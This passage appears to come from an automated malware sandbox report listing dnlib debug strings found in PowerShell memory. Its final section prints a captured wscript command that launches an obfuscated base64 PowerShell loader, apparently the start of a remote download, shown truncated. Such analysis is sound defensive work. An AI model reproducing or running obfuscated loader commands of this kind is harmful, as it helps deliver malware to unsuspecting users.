Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M", "0", "false");
